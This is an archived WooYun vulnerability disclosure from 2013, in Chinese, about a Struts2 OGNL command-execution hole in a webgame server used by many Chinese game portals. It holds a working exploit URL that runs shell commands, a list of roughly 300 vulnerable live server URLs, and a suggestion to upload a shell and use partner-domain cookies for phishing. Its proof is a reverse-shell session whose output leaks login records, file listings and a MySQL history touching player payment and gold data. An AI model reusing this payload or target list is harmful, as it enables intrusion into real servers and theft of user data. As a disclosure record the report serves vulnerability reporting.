当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-028937

漏洞标题:某知名WebGame游戏服务端 存在命令执行漏洞

相关厂商:傲世堂

漏洞作者: 猪猪侠

提交时间:2013-07-15 14:09

修复时间:2013-08-29 14:10

公开时间:2013-08-29 14:10

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-15: 细节已通知厂商并且等待厂商处理中
2013-07-15: 厂商已经确认,细节仅向厂商公开
2013-07-25: 细节向核心白帽子及相关领域专家公开
2013-08-04: 细节向普通白帽子公开
2013-08-14: 细节向实习白帽子公开
2013-08-29: 细节向公众公开

简要描述:

由于游戏服务端使用了第三方框架,导致第三方框架存在的漏洞,重现在已运营的服务器之上。
细看了下,4399、YY、51wan、duowan、51、91、浩方、360、kugou、七点、百度均代理了这款游戏,也就是说,直接在对应域名的服务器下上传一个shell,就能间接拿到对应代理公司的主域名COOKIE读写权限,跨站钓鱼调戏不亦乐乎!

详细说明:

# 由于游戏服务端采用了Java Struts框架,导致命令执行漏洞存在!

http://s58.as.game.yy.com/root/chat.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29]


# 受影响域名,只是简单的搜索出来,astd22.my4399.com,代表前面还有astd21、astd20等20来个服务器;其他的同理。
http://astd22.my4399.com/root/chat.action
http://astd26.g.pps.tv/root/chat.action
http://astd27.g.pps.tv/root/chat.action
http://gameas4.pipi.cn/root/chat.action
http://s1.as.8zy.com/root/chat.action
http://s17.as.jinjuzi.com/root/chat.action
http://s4.as.91.com/root/chat.action
http://s4.astd.wan.rising.cn/root/chat.action
http://s4.asyh.uoyoo.cn/root/chat.action
http://s69.astd.6711.com/root/chat.action
http://s7.astd.ifeng.com/root/chat.action
http://td6.huanlang.com/root/chat.action
http://td8.zhulang.com/root/chat.action
http://as1.game.tiexue.net/root/chat.action
http://astd.s1.53wan.com/root/chat.action
http://s66.as.peiyou.com/root/chat.action
http://as1.51wan.com/root/chat.action
http://astd17.29ww.com/root/chat.action
http://s319.as.yaowan.com/root/chat.action
http://s622.as.yaowan.com/root/chat.action
http://s11.astd.cga.com.cn/root/chat.action
http://s167.as.yaowan.com/root/chat.action
http://s3.astd.g.pptv.com/root/chat.action
http://s588.as.yaowan.com/root/chat.action
http://s80.astd.6711.com/root/chat.action
http://astd10.youxi567.com/root/chat.action
http://s1.3896.com/root/chat.action
http://s28.astd.6711.com/root/chat.action
http://s69.as.yaowan.com/root/chat.action
http://s77.astd.6711.com/root/chat.action
http://as2.neotv.jiuwan.com/root/chat.action
http://s116.astd.37wan.com/root/chat.action
http://s184.as.yaowan.com/root/chat.action
http://s605.as.yaowan.com/root/chat.action
http://x16.aoshi.renren.com/root/chat.action
http://s1.as.158wan.com/root/chat.action
http://s26.astd.37wan.com/root/chat.action
http://s328.as.yaowan.com/root/chat.action
http://s577.as.yaowan.com/root/chat.action
http://s89.as.peiyou.com/root/chat.action
http://x4.aoshi.renren.com/root/chat.action
http://astd1.youxi567.com/root/chat.action
http://astds8.snsfun.com/root/chat.action
http://s1.as.96pk.com/root/chat.action
http://s111.as.yaowan.com/root/chat.action
http://s15.astd.kuwo.cn/root/chat.action
http://s397.as.yaowan.com/root/chat.action
http://s42.as.game.yy.com/root/chat.action
http://s603.as.yaowan.com/root/chat.action
http://astd.s5.53wan.com/root/chat.action
http://s1.astd.smggame.net/root/chat.action
http://s573.as.yaowan.com/root/chat.action
http://s6.as.pcgames.com.cn/root/chat.action
http://gameas1.pipi.cn/root/chat.action
http://s2.astd.cga.com.cn/root/chat.action
http://s298.as.yaowan.com/root/chat.action
http://s59.as.yaowan.com/root/chat.action
http://x12.aoshi.renren.com/root/chat.action
http://x14.aoshi.renren.com/root/chat.action
http://s1.as.aoshitang.com/root/chat.action
http://s1.astd.6one.com.cn/root/chat.action
http://s1.astd.91555.com/root/chat.action
http://s123.as.yaowan.com/root/chat.action
http://s17.astd.g.1360.com/root/chat.action
http://s3.as.jinjuzi.com/root/chat.action
http://s52.astd.6711.com/root/chat.action
http://s585.as.yaowan.com/root/chat.action
http://s8.astd.51.com/root/chat.action
http://s92.astd.37wan.com/root/chat.action
http://assvr1.webgame.xunlei.com/root/chat.action
http://s16.as.56uu.com/root/chat.action
http://s163.as.yaowan.com/root/chat.action
http://s28.as.peiyou.com/root/chat.action
http://s75.astd.37wan.com/root/chat.action
http://res9.astd.cn/root/chat.action
http://s101.as.yaowan.com/root/chat.action
http://s6.astd.6711.com/root/chat.action
http://td1.huanlang.com/root/chat.action
http://x21.aoshi.renren.com/root/chat.action
http://astd06.game.qidian.com/root/chat.action
http://astd3.29ww.com/root/chat.action
http://astds1.snsfun.com/root/chat.action
http://s01.as.3722.com/root/chat.action
http://s32.baidu.astd.cn/root/chat.action
http://s62.as.game.yy.com/root/chat.action
http://astd07.game.qidian.com/root/chat.action
http://s103.as.yaowan.com/root/chat.action
http://s534.as.yaowan.com/root/chat.action
http://s94.astd.6711.com/root/chat.action
http://s18.as.game.yy.com/root/chat.action
http://s613.as.yaowan.com/root/chat.action
http://frxxz11.game.bnbwan.com/root/chat.action
http://frxxz12.game.bnbwan.com/root/chat.action
http://s17.baidu.astd.cn/root/chat.action
http://s621.as.yaowan.com/root/chat.action
http://s95.as.peiyou.com/root/chat.action
http://td09.jianggame.com/root/chat.action
http://td23.zhulang.com/root/chat.action
http://s34.astd.6711.com/root/chat.action
http://s427.as.yaowan.com/root/chat.action
http://s608.as.yaowan.com/root/chat.action
http://s79.as.yaowan.com/root/chat.action
http://s9.as.56uu.com/root/chat.action
http://td17.zhulang.com/root/chat.action
http://5.astd.youwo.com/root/chat.action
http://s1.astd.kuwo.cn/root/chat.action
http://astd09.game.qidian.com/root/chat.action
http://s10.astd.cga.com.cn/root/chat.action
http://s2.astd.tianya.cn/root/chat.action
http://s59.as.peiyou.com/root/chat.action
http://s632.as.yaowan.com/root/chat.action
http://s9.astd.cga.com.cn/root/chat.action
http://x1.aoshi.renren.com/root/chat.action
http://astd44.g.pps.tv/root/chat.action
http://hs35.as.yaowan.com/root/chat.action
http://s32.astd.g.1360.cn/root/chat.action
http://s32.astd.g.1360.com/root/chat.action
http://s56.as.peiyou.com/root/chat.action
http://s582.as.yaowan.com/root/chat.action
http://s66.as.game.yy.com/root/chat.action
http://td001.webxgame.com/root/chat.action
http://td50.zhulang.com/root/chat.action
http://x20.aoshi.renren.com/root/chat.action
http://s2.frxx.qidian.com/root/chat.action
http://s3.frxx.qidian.com/root/chat.action
http://s82.as.yaowan.com/root/chat.action
http://s8.frxx.qidian.com/root/chat.action
http://s9.frxx.qidian.com/root/chat.action
http://s616.as.yaowan.com/root/chat.action
http://s77.as.yaowan.com/root/chat.action
http://tdh1.kuwan8.com/root/chat.action
http://wap.astd.cn/root/chat.action
http://118.26.234.23/root/chat.action
http://s241.as.yaowan.com/root/chat.action
http://s479.as.yaowan.com/root/chat.action
http://s66.astd.37wan.com/root/chat.action
http://s211.as.yaowan.com/root/chat.action
http://s280.as.yaowan.com/root/chat.action
http://s5.as.kugou.com/root/chat.action
http://s629.as.yaowan.com/root/chat.action
http://s89.as.yaowan.com/root/chat.action
http://s7.frxx.qidian.com/root/chat.action
http://s482.as.yaowan.com/root/chat.action
http://s71.astd.37wan.com/root/chat.action
http://s91.as.peiyou.com/root/chat.action
http://s126.astd.37wan.com/root/chat.action
http://s169.as.yaowan.com/root/chat.action
http://s82.as.peiyou.com/root/chat.action
http://s93.as.game.yy.com/root/chat.action
http://118.26.234.28/root/chat.action
http://s129.as.yaowan.com/root/chat.action
http://s130.as.yaowan.com/root/chat.action
http://s24.as.womenwan.com/root/chat.action
http://astds3.snsfun.com/root/chat.action
http://s561.as.yaowan.com/root/chat.action
http://s72.as.game.yy.com/root/chat.action
http://s78.as.peiyou.com/root/chat.action
http://astd24.g.pps.tv/root/chat.action
http://s1.astd.ifeng.com/root/chat.action
http://s10.as.8zy.com/root/chat.action
http://s100.as.yaowan.com/root/chat.action
http://s2.astd.6one.com.cn/root/chat.action
http://s2.astd.wan.rising.cn/root/chat.action
http://s7.as.aoshitang.com/root/chat.action
http://s7.as.jiuwan.com/root/chat.action
http://s99.as.yaowan.com/root/chat.action
http://td30.huanlang.com/root/chat.action
http://td37.jianggame.com/root/chat.action
http://x19.aoshi.renren.com/root/chat.action
http://s93.as.yaowan.com/root/chat.action
http://s94.as.yaowan.com/root/chat.action
http://s134.as.yaowan.com/root/chat.action
http://s132.astd.37wan.com/root/chat.action
http://s204.as.yaowan.com/root/chat.action
http://s205.as.yaowan.com/root/chat.action
http://s612.as.yaowan.com/root/chat.action
http://s232.as.yaowan.com/root/chat.action
http://s50.as.game.yy.com/root/chat.action
http://s54.astd.6711.com/root/chat.action
http://s57.as.peiyou.com/root/chat.action
http://astd25.g.pps.tv/root/chat.action
http://hs35.as.yaowan.com/root/chat.action
http://s10-x.as.178.com/root/chat.action
http://s136.as.yaowan.com/root/chat.action
http://s28.astd.g.1360.com/root/chat.action
http://s5.3896.com/root/chat.action
http://s82.as.game.yy.com/root/chat.action
http://s104.as.peiyou.com/root/chat.action
http://s29.as.aoshitang.com/root/chat.action
http://s29.as.jiuwan.com/root/chat.action
http://s373.as.yaowan.com/root/chat.action
http://s56.astd.37wan.com/root/chat.action
http://as1.game.verycd.com/root/chat.action
http://astd34.g.pps.tv/root/chat.action
http://s41.as.aoshitang.com/root/chat.action
http://s58.as.peiyou.com/root/chat.action
http://s625.as.yaowan.com/root/chat.action
http://td31.huanlang.com/root/chat.action
http://s1.astd.g.pptv.com/root/chat.action
http://s13.as.womenwan.com/root/chat.action
http://s443.as.yaowan.com/root/chat.action
http://s52.as.game.yy.com/root/chat.action
http://s596.as.yaowan.com/root/chat.action
http://s79.astd.6711.com/root/chat.action
http://s8.astd.game2.com.cn/root/chat.action
http://astd1.uusee.com/root/chat.action
http://s170.as.yaowan.com/root/chat.action
http://s3.astd.51.com/root/chat.action
http://s265.as.yaowan.com/root/chat.action
http://s266.as.yaowan.com/root/chat.action
http://astd1.78bar.com/root/chat.action
http://astds5.snsfun.com/root/chat.action
http://s105.as.yaowan.com/root/chat.action
http://s4.astd.6711.com/root/chat.action
http://s46.as.aoshitang.com/root/chat.action
http://as901.51wan.com/root/chat.action
http://s1.as.kugou.com/root/chat.action
http://s139.as.yaowan.com/root/chat.action
http://s140.as.yaowan.com/root/chat.action
http://s38.astd.6711.com/root/chat.action
http://s1.astd.51.com/root/chat.action
http://s510.as.yaowan.com/root/chat.action
http://s29.astd.game2.com.cn/root/chat.action
http://s48.as.aoshitang.com/root/chat.action
http://s50.astd.37wan.com/root/chat.action
http://s103.astd.37wan.com/root/chat.action
http://s14.as.jiuwan.com/root/chat.action
http://s38.astd.g.1360.com/root/chat.action
http://s551.as.yaowan.com/root/chat.action
http://as14.xdwan.com/root/chat.action
http://s549.as.yaowan.com/root/chat.action
http://s1.astd.37wan.com/root/chat.action
http://s16.as.yaowan.com/root/chat.action
http://s39.as.peiyou.com/root/chat.action
http://s611.as.yaowan.com/root/chat.action
http://s10.as.91.com/root/chat.action
http://s122.astd.37wan.com/root/chat.action
http://s4.astd.g.pptv.com/root/chat.action
http://s521.as.yaowan.com/root/chat.action
http://s576.as.yaowan.com/root/chat.action
http://td62.webxgame.com/root/chat.action
http://s3.as.yaowan.com/root/chat.action
http://s6.astd.g.1360.com/root/chat.action
http://as1.neotv.jiuwan.com/root/chat.action
http://astd29.g.pps.tv/root/chat.action
http://astd9.uusee.com/root/chat.action
http://s1.as.uc55.cn/root/chat.action
http://s1.astd.g.1360.com/root/chat.action
http://s11.astd.ifeng.com/root/chat.action
http://s143.as.yaowan.com/root/chat.action
http://s35.as.aoshitang.com/root/chat.action
http://s592.as.yaowan.com/root/chat.action
http://s6.astd.baofenggame.com/root/chat.action
http://s6.astd.wan.rising.cn/root/chat.action
http://s70.as.game.yy.com/root/chat.action
http://as17.xdwan.com/root/chat.action
http://s145.as.yaowan.com/root/chat.action
http://s464.as.yaowan.com/root/chat.action
http://s83.astd.37wan.com/root/chat.action
http://s88.as.yaowan.com/root/chat.action
http://astd01.game.qidian.com/root/chat.action
http://s1.as.womenwan.com/root/chat.action
http://s124.as.womenwan.com/root/chat.action
http://s421.as.yaowan.com/root/chat.action
http://s571.as.yaowan.com/root/chat.action
http://s20.as.56uu.com/root/chat.action
http://s497.as.yaowan.com/root/chat.action
http://s78.as.game.yy.com/root/chat.action
http://s1.astd.snstele.com/root/chat.action
http://s22.as.yaowan.com/root/chat.action
http://s590.as.yaowan.com/root/chat.action
http://td25.huanlang.com/root/chat.action
http://as3.neotv.jiuwan.com/root/chat.action
http://s1.as.3737.com/root/chat.action
http://s188.as.yaowan.com/root/chat.action
http://s40.as.peiyou.com/root/chat.action
http://s40.as.womenwan.com/root/chat.action
http://s595.as.yaowan.com/root/chat.action
http://s1.kaixin.astd.cn/root/chat.action
http://s539.as.yaowan.com/root/chat.action
http://s80.as.peiyou.com/root/chat.action
http://s171.as.yaowan.com/root/chat.action
http://s32.as.peiyou.com/root/chat.action
http://x7.aoshi.renren.com/root/chat.action
http://s1.astd.niua.com/root/chat.action
http://s5.as.womenwan.com/root/chat.action
http://s620.as.yaowan.com/root/chat.action
http://s9-x.as.178.com/root/chat.action
http://s148.as.yaowan.com/root/chat.action
http://s525.as.yaowan.com/root/chat.action
http://s113.astd.37wan.com/root/chat.action
http://s352.as.yaowan.com/root/chat.action
http://s574.as.yaowan.com/root/chat.action
http://td15.webxgame.com/root/chat.action
http://astd.s3.53wan.com/root/chat.action
http://s455.as.yaowan.com/root/chat.action
http://s103.as.peiyou.com/root/chat.action
http://s50.as.56uu.com/root/chat.action
http://s500.as.yaowan.com/root/chat.action
http://s609.as.yaowan.com/root/chat.action
http://s14.astd.37wan.com/root/chat.action
http://s1-x.as.178.com/root/chat.action
http://s75.as.yaowan.com/root/chat.action
http://s8.as.91.com/root/chat.action
http://s514.as.yaowan.com/root/chat.action
http://s560.as.yaowan.com/root/chat.action
http://td5.zhulang.com/root/chat.action
http://s1.baidu.astd.cn/root/chat.action
http://s1.weibo.astd.cn/root/chat.action
http://s133.as.yaowan.com/root/chat.action
http://s1.astd.cga.com.cn/root/chat.action
http://s1.astd.uz73.com/root/chat.action
http://s2.astd.cga.com.cn/root/chat.action
http://s30.as.jinjuzi.com/root/chat.action
http://s34.astd.37wan.com/root/chat.action
http://as15.51wan.com/root/chat.action
http://as16.xdwan.com/root/chat.action
http://s1.astd.ipark.cn/root/chat.action
http://s107.as.peiyou.com/root/chat.action
http://s155.as.yaowan.com/root/chat.action
http://s384.as.yaowan.com/root/chat.action
http://as1.xdwan.com/root/chat.action
http://s30.baidu.astd.cn/root/chat.action
http://s512.as.yaowan.com/root/chat.action
http://s76.as.peiyou.com/root/chat.action
http://s77.as.game.yy.com/root/chat.action
http://s12.astd.cga.com.cn/root/chat.action
http://s406.as.yaowan.com/root/chat.action
http://s530.as.yaowan.com/root/chat.action
http://s607.as.yaowan.com/root/chat.action
http://td41.zhulang.com/root/chat.action
http://s433.as.yaowan.com/root/chat.action
http://s1.as.pcgames.com.cn/root/chat.action
http://s244.as.yaowan.com/root/chat.action
http://s31.astd.game2.com.cn/root/chat.action
http://s40.astd.g.1360.com/root/chat.action
http://s108.as.game.yy.com/root/chat.action
http://s248.as.yaowan.com/root/chat.action
http://s34.astd.g.1360.com/root/chat.action
http://s45.as.aoshitang.com/root/chat.action
http://s62.as.peiyou.com/root/chat.action
http://as44.xdwan.com/root/chat.action
http://s34.as.game.yy.com/root/chat.action
http://td59.zhulang.com/root/chat.action
http://s13.astd.kuwo.cn/root/chat.action
http://s470.as.yaowan.com/root/chat.action
http://td89.webxgame.com/root/chat.action
http://s115.as.yaowan.com/root/chat.action
http://s116.as.yaowan.com/root/chat.action
http://s24.astd.game2.com.cn/root/chat.action
http://s49.astd.6711.com/root/chat.action
http://s51.as.aoshitang.com/root/chat.action
http://as1.29293.com/root/chat.action
http://astd20.g.pps.tv/root/chat.action
http://s01.as.175pt.net/root/chat.action
http://s11.as.8zy.com/root/chat.action
http://s12.as.aoshitang.com/root/chat.action
http://s3.asyh.uoyoo.cn/root/chat.action
http://s579.as.yaowan.com/root/chat.action
http://s7-x.as.178.com/root/chat.action
http://s-9.as.jinjuzi.com/root/chat.action
http://as1.91wan.com/root/chat.action
http://s41.as.yaowan.com/root/chat.action
http://s5.astd.cga.com.cn/root/chat.action
http://s11-x.as.178.com/root/chat.action
http://s1-2.astd.kuaiwan.com/root/chat.action
http://s208.as.yaowan.com/root/chat.action
http://s9.as.kugou.com/root/chat.action
http://td18.huanlang.com/root/chat.action
http://s119.as.yaowan.com/root/chat.action
http://s68.as.game.yy.com/root/chat.action
http://td86.webxgame.com/root/chat.action
http://s200.as.yaowan.com/root/chat.action
http://s33.baidu.astd.cn/root/chat.action
http://s46.as.peiyou.com/root/chat.action
http://s507.as.yaowan.com/root/chat.action
http://s1.astd.funshion.com/root/chat.action
http://s15.3896.com/root/chat.action
http://s511.as.yaowan.com/root/chat.action
http://s57.as.yaowan.com/root/chat.action
http://s578.as.yaowan.com/root/chat.action
http://astd14.g.pps.tv/root/chat.action
http://s1.astd.game2.com.cn/root/chat.action
http://astd19.g.pps.tv/root/chat.action
http://s1.as.yaowan.com/root/chat.action
http://s53.as.aoshitang.com/root/chat.action
http://s85.astd.6711.com/root/chat.action
http://astds11.snsfun.com/root/chat.action
http://s391.as.yaowan.com/root/chat.action
http://x23.aoshi.renren.com/root/chat.action
http://s11.astd.51.com/root/chat.action
http://s147.as.peiyou.com/root/chat.action
http://s182.as.yaowan.com/root/chat.action
http://s36.astd.g.1360.com/root/chat.action
http://s518.as.yaowan.com/root/chat.action
http://td17.webxgame.com/root/chat.action
http://s100.astd.37wan.com/root/chat.action
http://s499.as.yaowan.com/root/chat.action
http://s8.astd.6711.com/root/chat.action
http://s27.as.56uu.com/root/chat.action
http://s4-x.as.178.com/root/chat.action
http://s584.as.yaowan.com/root/chat.action
http://s601.as.yaowan.com/root/chat.action
http://s11.astd.kuwo.cn/root/chat.action
http://s165.as.yaowan.com/root/chat.action
http://s532.as.yaowan.com/root/chat.action
http://astd.s2.53wan.com/root/chat.action
http://s1.as.kedou.com/root/chat.action
http://s630.as.yaowan.com/root/chat.action
http://td1.zhulang.com/root/chat.action
http://s1.as.feixue.com/root/chat.action
http://s25.baidu.astd.cn/root/chat.action
http://s43.as.aoshitang.com/root/chat.action
http://s558.as.yaowan.com/root/chat.action
http://s13-x.as.178.com/root/chat.action
http://s253.as.yaowan.com/root/chat.action
http://s58.as.game.yy.com/root/chat.action
http://td13.zhulang.com/root/chat.action
http://s27.baidu.astd.cn/root/chat.action
http://s45.astd.6711.com/root/chat.action
http://s536.as.yaowan.com/root/chat.action
http://s54.as.game.yy.com/root/chat.action
http://td56.zhulang.com/root/chat.action
http://s223.as.yaowan.com/root/chat.action
http://s3.astd.cga.com.cn/root/chat.action
http://s545.as.yaowan.com/root/chat.action
http://s277.as.yaowan.com/root/chat.action
http://s540.as.yaowan.com/root/chat.action
http://s566.as.yaowan.com/root/chat.action
http://s9.3896.com/root/chat.action

漏洞证明:

[root@localhost ~]# nc -l 53
Linux astd-f07-06.bjkd 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
uid=500(astd) gid=500(astd) groups=500(astd) context=user_u:system_r:unconfined_t:s0
last -n 10
xujp pts/0 10.6.20.242 Mon Jul 15 11:02 still logged in
xujp pts/1 10.6.20.242 Fri Jul 12 16:57 - 17:57 (01:00)
xujp pts/0 10.6.20.241 Fri Jul 12 16:29 - 21:11 (04:41)
xujp pts/0 10.6.20.241 Fri Jul 12 11:18 - 13:10 (01:52)
xujp pts/0 10.6.20.241 Thu Jul 11 17:58 - 21:10 (03:12)
xujp pts/0 10.6.20.241 Thu Jul 11 15:29 - 17:30 (02:00)
xujp pts/0 10.6.20.241 Thu Jul 11 09:39 - 15:11 (05:31)
xujp pts/0 10.6.20.241 Wed Jul 10 17:32 - 21:06 (03:34)
xujp pts/0 10.6.20.241 Wed Jul 10 12:34 - 15:08 (02:34)
xujp pts/0 10.6.20.241 Tue Jul 9 17:48 - 21:08 (03:19)
wtmp begins Tue Apr 10 00:53:09 2012
uname -a
Linux astd-f07-06.bjkd 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
cd ~
ls -lah
total 5.8M
drwx------ 12 astd astd 4.0K Jul 14 18:36 .
drwxr-xr-x 7 root root 4.0K May 4 12:49 ..
-rw-r--r-- 1 astd astd 84 Jun 9 16:53 178_13_0609
-rw-rw-r-- 1 astd astd 24 Jun 28 15:24 178_13.log
-rw-rw-r-- 1 astd astd 0 Jun 28 15:24 178_13_ticket.flag
drwxrwxr-x 2 astd astd 4.0K May 31 12:37 astd_178_13_20130531
drwxrwxr-x 2 astd astd 4.0K May 31 12:39 astd_duowan_58_20130531
-rw-r--r-- 1 astd astd 54K May 27 18:40 astd-listener.jar
-rw-rw-r-- 1 astd astd 5.4M Jun 28 11:02 astd_patch_astd_7-9-0-3_20130628.tar.gz
drwxrwxr-x 2 astd astd 4.0K May 31 12:40 astd_peiyou_64_20130531
-rw-rw-r-- 1 astd astd 45 Jul 14 18:31 astd_peiyou_64.tgz
-rw-r--r-- 1 astd astd 5.6K Jul 5 13:21 astd_update_7-9-0_global.sh
-rw-rw-r-- 1 astd astd 5.3K Jun 28 12:54 astd_update_7-9-0.sh
drwxrwxr-x 2 astd astd 4.0K May 31 12:42 astd_yaowan_253_20130531
drwxrwxr-x 2 astd astd 4.0K May 31 12:43 astd_zhulang_13_20130531
-rw------- 1 astd astd 7.6K Jul 9 11:10 .bash_history
-rw-r--r-- 1 astd astd 176 Jul 9 11:11 .bash_profile
-rw-rw-r-- 1 astd astd 178 Jun 16 22:18 .bashrc
-rw-rw-r-- 1 astd astd 53 Jun 1 08:53 .bs.tomcat.id
drwxrwxr-x 2 astd astd 4.0K Jun 22 12:58 dbbak
-rw-r--r-- 1 astd astd 226 Jun 28 12:47 dowload.sh
-rw-r--r-- 1 astd astd 90 Jun 9 16:54 duowan_58_0609
-rw-rw-r-- 1 astd astd 27 Jun 28 15:26 duowan_58.log
-rw-rw-r-- 1 astd astd 0 Jun 28 15:26 duowan_58_ticket.flag
drwxr-xr-x 3 astd astd 4.0K Jun 17 11:45 kfz_tools
-rw------- 1 astd astd 35 Jun 27 18:17 .lesshst
-rw-r--r-- 1 astd astd 1.5K Jul 4 19:03 log_conf.template8
-rw-rw-r-- 1 astd astd 489 May 23 10:57 make_tgz.sh
-rw------- 1 astd astd 5.8K Jun 27 18:16 .mysql_history
-rw-r--r-- 1 root root 5.8K Jul 15 11:05 .mysql_history_bak
drwxr-xr-x 2 astd astd 4.0K May 15 2012 .ncftp
-rw-r--r-- 1 astd astd 11 Jun 9 16:55 peiyou_64_0609
-rw-rw-r-- 1 astd astd 22 Jun 28 15:27 peiyou_64.log
-rw-r--r-- 1 astd astd 1.2K Jun 27 10:59 set_event.sh
drwx------ 2 astd astd 4.0K May 3 11:45 .ssh
-rw-rw-r-- 1 astd astd 1.1K Jul 8 17:36 tj.sh
drwx------ 2 astd astd 4.0K May 9 10:19 tools
-rw-r--r-- 1 astd astd 66 Jul 4 17:45 update_0704.sql
-rw-r--r-- 1 astd astd 1.1K Jun 27 17:29 update_mail.sh
-rw-r--r-- 1 astd astd 1.1K Jun 28 15:16 update_ticket.sh
-rw------- 1 astd astd 1.4K Jun 27 18:16 .viminfo
-rw-r--r-- 1 astd astd 284 Jun 16 22:12 .vimrc
-rw-r--r-- 1 astd astd 92 Jun 9 16:57 yaowan_253_0609
-rw-rw-r-- 1 astd astd 28 Jun 28 15:30 yaowan_253.log
-rw-rw-r-- 1 astd astd 0 Jun 28 15:30 yaowan_253_ticket.flag
-rw-r--r-- 1 astd astd 92 Jun 9 16:58 zhulang_13_0609
-rw-rw-r-- 1 astd astd 28 Jun 28 15:31 zhulang_13.log
-rw-rw-r-- 1 astd astd 0 Jun 28 15:31 zhulang_13_ticket.flag
cat .mysql_history
_HiStOrY_V2_
\040show\040databases;
create\040database\040tomcat_178_13;
create\040database\040tomcat_mix_80;
\040show\040databases;
drop\040database\040tomcat_178_13;
drop\040database\040tomcat_mix_80;
create\040database\040neice_178_13;
create\040database\040neice_duowan58;
create\040database\040neice_mix_80;
create\040database\040neice_zl13;
\040show\040databases;
\040show\040databases;
\040show\040databases;
use\040neice_178_13;
select\040count(*)\040from\040player;
select\040count(*)\040from\040neice_duowan58.player;
select\040count(*)\040from\040neice_mix_80.player;
select\040count(*)\040from\040neice_zl13.player;
\040show\040databases;
show\040databases;
use\040neice_zl13;
select\040*\040from\040player\040where\040\040player_name="SDHAS";
show\040tables;
desc\040pay_detail_record;
desc\040player_key_statistics;
select\040*\040from\040player\040where\040\040player_name="SDHAS";
select\040*\040from\040player_key_statistics\040where\040user_id=6515636;
select\040*\040from\040player\040where\040\040player_name\040in\040("SDHAS","SDNeR","DFJD","\M-e\M^B\M-2\M-d\M-8\M^V\M-g\M^A\M-,Say");
select\040*\040from\040player_key_statistics\040where\040user_id=6515636
;
select\040*\040from\040player_key_statistics\040where\040user_id=6515636
;
select\040*\040from\040pay_detail_record\040where\040player_id=15783;
select\040*\040from\040pay_detail_record\040where\040player_id=46100;
select\040*\040from\040pay_detail_record\040where\040player_id=34673
;
select\040*\040from\040pay_detail_record\040where\040player_id=46182;
select\040order_id,pay_time,charge,player_name\040from\040pay_detail_record,player\040where\040player.player_id=pay_detail_record.player_id\040where\040pay_detail_record.player_id=46182;
select\040order_id,pay_time,charge,player_name\040from\040pay_detail_record,player\040where\040player.player_id=pay_detail_record.player_id\040and\040pay_detail_record.player_id=46182;
tee\040/tmp/zhulang.txt
select\040order_id,pay_time,charge,player_name\040from\040pay_detail_record,player\040where\040player.player_id=pay_detail_record.player_id\040and\040pay_detail_record.player_id=46182;
select\040*\040from\040player\040where\040\040player_name\040in\040("SDHAS","SDNeR","DFJD","\M-e\M^B\M-2\M-d\M-8\M^V\M-g\M^A\M-,Say");
use\040neice_zl13;
select\040*\040from\040player\040where\040\040player_name\040in\040("SDHAS","SDNeR","DFJD","\M-e\M^B\M-2\M-d\M-8\M^V\M-g\M^A\M-,Say");
select\040*\040from\040player\040where\040\040player_name\040in\040("SDHAS","SDNeR","DFJD","\M-e\M^B\M-2\M-d\M-8\M^V\M-g\M^A\M-,Say")
\134g
select\040*\040from\040player\040where\040\040player_name\040in\040("SDHAS","SDNeR","DFJD","\M-e\M^B\M-2\M-d\M-8\M^V\M-g\M^A\M-,Say")
\134G
\134q
show\040databases;
use\040neice_mix_80;
desc\040player;
select\040*\040from\040player\040where\040yx="yaowan"\040limit\04010;
select\040*\040from\040player\040where\040yx="peiyou"\040limit\04010;
\134q
show\040databases;
use\040neice_mix_80;
desc\040player;
show\040tables;
select\040*\040from\040server_data;
update\040server_data\040set\040s_value=s_value+163612\040where\040id=2;
select\040*\040from\040server_data;
update\040server_data\040set\040s_value=s_value+80926\040where\040id=3;
select\040*\040from\040server_data;
\134q
show\040databases;
drop\040database\040neice_mix_88;
show\040databases;
\134q
show\040databases;
use\040neice_178_13;
show\040tables;
desc\040player;
select\040player_id,player_name,SYS_GOLD,USER_GOLD,user_id,user_id_2\040from\040player\040where\040player_name="\M-h\M^I\M->\M-e\M->\M-7";
update\040player\040set\040SYS_GOLD=SYS_GOLD-5000,version+1\040where\040player_id=4129;
update\040player\040set\040SYS_GOLD=SYS_GOLD-5000,version=version+1\040where\040player_id=4129;
select\040player_id,player_name,SYS_GOLD,USER_GOLD,user_id,user_id_2\040from\040player\040where\040player_name="\M-h\M^I\M->\M-e\M->\M-7";
select\040player_id,player_name,SYS_GOLD,USER_GOLD,user_id,user_id_2\040from\040player\040where\040player_name="\M-h"\M-f\M^H\M^X\M-g\M-%\M^^\M-e\M^P\M^U\M-e\M-8\M^C";
q
;
q
by
bye
\134q
;
"
show\040databases;
use\040neice_178_13;
desc\040player;
select\040player_id,player_name,SYS_GOLD,USER_GOLD,user_id,user_id_2\040from\040player\040where\040player_name="\M-f\M^H\M^X\M-g\M-%\M^^\M-e\M^P\M^U\M-e\M-8\M^C";
update\040player\040set\040SYS_GOLD=SYS_GOLD-5000,version=version+1\040where\040player_id=10123;
select\040player_id,player_name,SYS_GOLD,USER_GOLD,user_id,user_id_2\040from\040player\040where\040player_name="\M-f\M^H\M^X\M-g\M-%\M^^\M-e\M^P\M^U\M-e\M-8\M^C";
select\040player_id,player_name,SYS_GOLD,USER_GOLD,user_id,user_id_2\040from\040player\040where\040player_name="\M-f\M^H\M^X"\M-h\M^I\M->\M-e\M->\M-7";
\040show\040databases;\040
use\040neice_mix_80
select\040distinct\040yx\040from\040player;
